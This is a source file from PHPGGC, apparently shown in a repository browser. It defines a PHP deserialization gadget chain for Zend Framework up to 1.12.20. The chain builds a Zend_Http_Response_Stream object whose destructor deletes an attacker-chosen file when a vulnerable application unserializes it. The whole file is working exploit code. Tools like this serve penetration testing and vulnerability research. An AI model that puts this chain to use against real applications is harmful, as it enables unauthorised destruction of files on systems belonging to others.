Codebase list phpggc / 92a48fd gadgetchains / ZendFramework / FD / 1 / chain.php
92a48fd

Tree @92a48fd (Download .tar.gz)

chain.php @92a48fdraw · history · blame

<?php

namespace GadgetChain\ZendFramework;

class FD1 extends \PHPGGC\GadgetChain\FileDelete
{
    public static $version = '? <= 1.12.20';
    public static $vector = '__destruct';
    public static $author = 'mpchadwick';
    public static $parameters = [
        'remote_path'
    ];

    public function generate(array $parameters)
    {
        $file = $parameters['remote_path'];

        return new \Zend_Http_Response_Stream(
            true,
            $file
        );
    }
}